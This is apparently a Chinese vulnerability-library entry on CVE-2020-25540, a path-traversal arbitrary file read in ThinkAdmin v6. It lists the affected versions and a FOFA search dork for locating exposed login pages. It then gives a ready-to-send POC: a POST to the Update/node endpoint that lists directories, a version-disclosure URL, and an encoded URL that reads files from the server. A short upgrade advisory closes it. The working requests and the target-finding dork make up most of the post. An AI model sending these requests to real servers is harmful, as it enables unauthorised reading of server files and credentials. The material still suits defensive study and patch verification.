—
title: ‘Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)’
date: Mon, 21 Sep 2020 00:58:07 +0000
draft: false
tags: [‘白阁-漏洞库’]
—
#### 漏洞信息:
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。
#### 影响范围:
Thinkadmin版本小于 ≤ 2020.08.03.01
#### 漏洞复现:
fofa\_dork: “ThinkAdmin” && title”系统登录 · ThinkAdmin”
##### POC:
“`
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
rules=%5B%22.%2F%22%5D
“` 获取版本信息:“`
https://xxxxx/admin.html?s=admin/api.Update/version
“`2、⽂件读取,后⾯那⼀串是UTF8字符串加密后的结果。计算⽅式在Update.php中的加密函数。 /admin.html? s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 [](/static/baige/01-CMS漏洞/Thinkadmin/https://www.bylibrary.cn/wp-content/uploads/2020/09/wp_editor_md_502ae6ea9426ef92a5791175b16de552.jpg)
#### 修复方案:
目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本













请登录后查看评论内容